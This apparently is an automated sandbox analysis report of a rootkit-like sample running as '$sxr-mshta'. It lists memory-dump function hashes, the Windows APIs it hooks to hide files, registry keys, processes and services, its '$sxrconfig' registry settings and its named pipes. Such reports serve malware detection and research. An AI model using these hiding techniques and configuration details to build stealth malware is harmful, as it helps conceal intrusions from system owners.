• Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
• Instruction Fuzzy Hash: 6FE11272709A809EE702CF68D0802DD7FB1F346789F158116EE4E6BB99DA38C55BC781
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: *?$HIJKLMNOPQRSTUVWXYZ
• API String ID: 3215553584-1407779936
• Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
• Instruction ID: 0974ccd98fc7b9cab5d1c040b5a3b9264d1ca2e249b3198ec3b5983a8dd0c499
• Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
• Instruction Fuzzy Hash: C9510372712B5485EF10DFE6A8106DDABA5FB5EBD4FC44921DE0D87B85EB38C0418381
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
• Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CurrentProcess
• String ID:
• API String ID: 1249254920-0
• Opcode ID: 9cf6c44da13e02a05fc4d3dcc4ca3e30ed2f46184eaf7001aa2c8df375b04596
• Instruction ID: eff9436ee664a6a6fb3846fbd81a6564da1ef290e4bb1e821d34349bbfc16670
• Opcode Fuzzy Hash: 9cf6c44da13e02a05fc4d3dcc4ca3e30ed2f46184eaf7001aa2c8df375b04596
• Instruction Fuzzy Hash: 56D0C759E4C507D6FB1837716C5543552609F6CB51F059034DB2B87310DD3C7486CB00
Uniqueness

Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e98009fc70158ea5415607d79adf01d037d59db10dc6a2a59361e2c62c52725f
• Instruction ID: 1804976eeac7f45a8791683f7552c3acd3cea74bf78669456bcb59303b6c1cf9
• Opcode Fuzzy Hash: e98009fc70158ea5415607d79adf01d037d59db10dc6a2a59361e2c62c52725f
• Instruction Fuzzy Hash: 6951F0327056909DFB209B7AA9002DE7FA5B746BE5F148215EE9C67F8ACB38C501C781
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
• Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: d18d6d85a8f617bb5500e753f487753302b7fe5cd23ded35b267988b4d6b386f
• Instruction ID: be70d6fb7d9730957015856da2115a43447da22d2a682f9b348507b9cec9baeb
• Opcode Fuzzy Hash: d18d6d85a8f617bb5500e753f487753302b7fe5cd23ded35b267988b4d6b386f
• Instruction Fuzzy Hash: E8B09218FA9402E1E604BB619C8146012A0AB68720FC10430D10DC2120DE5CA19A8F00
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
Similarity
• API ID:
• String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02a0dc21c4cc38a4ec26d0a9d58c393b00474c81d7d375ca2079895bfbc551e1
                                                                                                            • Instruction ID: 27e0c2f26730fa75359452f94bcff31a48825c71f4b90babbe0e480e9d18d965
                                                                                                            • Opcode Fuzzy Hash: 02a0dc21c4cc38a4ec26d0a9d58c393b00474c81d7d375ca2079895bfbc551e1
                                                                                                            • Instruction Fuzzy Hash: F4F068727152548AEB95CF69A442B997BE0F34C3C0F808519D68AC3B14D33C84509F45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7465cf9d9df8522566c1825c6aca6e7efb4b7e8f362465355fb385eb86a5387d
                                                                                                            • Instruction ID: fef43c8687809109f500699dc2f355aac25a11132c3f1021da8e4966bfd68607
                                                                                                            • Opcode Fuzzy Hash: 7465cf9d9df8522566c1825c6aca6e7efb4b7e8f362465355fb385eb86a5387d
                                                                                                            • Instruction Fuzzy Hash: C2E0C07BB0F6C11EE6A34A1C4C6A1882F90F767B22F09C04ECBE463283D1060C418757
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                            • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                            • API String ID: 106492572-3028563969
                                                                                                            • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction ID: 942e08efff57fe41156c140f0d67fc0396b61bf0044a7856eccda8ee7dfdfdc0
                                                                                                            • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction Fuzzy Hash: 35714D36312A5089EB11EF69E8806DD3BB5FB86B8AF009511DE4D67F29DF38C584C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                            • API String ID: 1741086925-759476645
                                                                                                            • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction ID: 69bede8bcbc7ef82e6cdb30a2f2d91b74dad5c58e0fbb65e3ff6cae2bf28b7b3
                                                                                                            • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction Fuzzy Hash: 2E419A74313A4AA8FA06DB6CE9516D42B34A746347F82D413D40D32177DE78C6C9D3E2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                            • String ID: d
                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                            • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction ID: 6a151138ffa7dbc73349005a95e2520a116a532a86707507cf6ee88cab1e77ca
                                                                                                            • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction Fuzzy Hash: 1F516C72305B849BE715CF66E5483AABBA1F78AB82F44C128DB4D17B14DF38C195C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                            • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                            • API String ID: 2171963597-1213686612
                                                                                                            • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction ID: 40936ec3964d45e28d32eaa577eb0f4003091f120f49a7850a50184811bc72c8
                                                                                                            • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction Fuzzy Hash: 6321713671575097FB14CB29F4043A97BA0F386BA6F508215DA5E12FA8CF3CC189CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                            • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction ID: 778158212f534029580ab6218e0794010b35d079fe21a56bb590d838d6aa9a83
                                                                                                            • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction Fuzzy Hash: 52417133215B809BE7608F65E5447DABBA1F38AB86F008129DB8D17B54DF38D1A5CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 5647a49a26bf4c4f51703fa53c1e03839352a16dd976af18536983204f530c3e
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: D181CF317022418EFF55AB6E98413E92E91AB87783F149425DA0DB7797EB3CC98187C2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 6117682b80ba718a5a92e8ab5a7f09ef1c50c304bd28b51c3ba6235488525097
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 9481057270364186FA51ABE698413D9EEE2B74F780FC44E259A05C7796DF38C881A7C3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                            • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction ID: 5f3f069d4a4415dbc069c0bfeb4c18b31f89ab0407aaf717dcd4bdf8aa866b38
                                                                                                            • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction Fuzzy Hash: A3310B31313780A9EE12DB0EE9007D96B94F746BA6F194525FD2D6BB95DF38C144C382
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                            • String ID: CONOUT$
                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                            • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction ID: c0662b82667819f83d8a447fa925f11b530f544bf5b73c1cc39cc5b34c84c6c7
                                                                                                            • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction Fuzzy Hash: 8011EB31311B408BE3518B4AF8443997BA0F79AFE6F00C224EE1D97794DF38C9848782
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Current$Context
                                                                                                            • String ID:
                                                                                                            • API String ID: 1666949209-0
                                                                                                            • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction ID: cda0b591bae2059604ab7f700e02ec0491f1ed4cec0426b5c0b3d43ffae0e199
                                                                                                            • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction Fuzzy Hash: 60D1EB36309B888ADA30DB1AE49039A7BA0F789B85F104216EACD57BA5DF7CC551CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID: $sxr
                                                                                                            • API String ID: 756756679-21942930
                                                                                                            • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction ID: 35d7d65ea24e8c9606904751b73a09850b7c3e5515182974f7649a518509ab7e
                                                                                                            • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction Fuzzy Hash: 4D310932B03B518AE711DF5EE8443A96BA0FB46B82F08C024DF5C17B55EF38C8A18781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 4104442557-0
                                                                                                            • Opcode ID: 3aee56793f856ebc4bf5ed15d236b07679841bd6bfcb628e62788a85eda43e84
                                                                                                            • Instruction ID: 7ae107239ebcff26f3243485f8746d55a8349dc3964719a9bf1083d2d7c18fbd
                                                                                                            • Opcode Fuzzy Hash: 3aee56793f856ebc4bf5ed15d236b07679841bd6bfcb628e62788a85eda43e84
                                                                                                            • Instruction Fuzzy Hash: 3E114D2AA48B468AEB10EF70E8446A933A4FB19758F400A30FA6D87754DF7CE5A4C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 517849248-0
                                                                                                            • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction ID: 6afdd469103f379db64996c8cfa30bc1b7527edcdf553316564fa564b1c4c2a3
                                                                                                            • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction Fuzzy Hash: D4016D31701B419AEB14DB1AA4587A967A1F789FC2F88C038CE8D57B54DE3CC9C5C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 449555515-0
                                                                                                            • Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction ID: f8210f893dce83ceccaab412ba2a7218df0b250a25964d8c8b8a362a6cf4987f
                                                                                                            • Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction Fuzzy Hash: 0F1180757037409AFB219B29F4083A92BA0FB4AB83F048428CD4D67755EF3DC088C742
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 2395640692-629598281
                                                                                                            • Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction ID: e02e388889a0293784d9547e932927c8d51fedf1367219bd997b7ba9774167db
                                                                                                            • Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction Fuzzy Hash: E351D1327126008EEB54CF19E448B9D3BA5F356B8AF518124FE1E67B8ADB34C841C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                            • String ID: \\?\
                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                            • Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction ID: 54d4dfca6376f8c51e40232c4094d319cb2549e6940bd67141a105f8b552e8f3
                                                                                                            • Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction Fuzzy Hash: FDF0C2723016409AEB308B28F4947D96B61F745B8AF84D034CA4C5A955DF3CC6CCCB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CombinePath
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3422762182-91387939
                                                                                                            • Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction ID: 5b560047f8afd5aafab56e7499eb06e30cfde2d68a3c9ce1416091437136b670
                                                                                                            • Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction Fuzzy Hash: ABF08270705B8095EA018B5BF9151A96A61AB4AFD3F04D130DE6E77B29CF3CC8C58385
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction ID: 4667da9ab5f4ad758b3fce486beb0eda209f9700ed7b5af4586aa60f9eedb487
                                                                                                            • Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction Fuzzy Hash: 05F0A771B1370099FF458B69E4887E42B60EB8AB43F049019D51F56961CF3CC5C8C782
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
